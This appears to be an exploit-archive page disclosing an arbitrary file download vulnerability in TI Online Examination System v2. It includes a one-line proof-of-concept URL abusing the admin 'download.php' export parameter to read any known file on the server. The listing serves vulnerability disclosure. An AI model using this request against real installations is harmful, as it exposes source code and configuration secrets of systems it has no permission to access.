Ti online examination system v2 arbitrary file download Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2018-08-02 |
Type : webapps |
Platform : php
This exploit / vulnerability Ti online examination system v2 arbitrary file download is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: TI Online Examination System v2 - Arbitrary File Download
# Dork: N/A
# Date: 02.08.2018
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Vendor Homepage: https://codecanyon.net/item/ti-online-examination-system-v2/11248904
# Version: 2.0
# Category: Webapps
# Tested on: Kali linux
# Description : The "Export" operation in the admin panel is vulnerable.
The attacker can download and read all files known by the name via
"download.php"
# PoC :
http://server/admin/download.php?action=downloadfile&file=[filename]
you can write the known file name instead of [filename]. For Example:
'download.php' or 'index.php'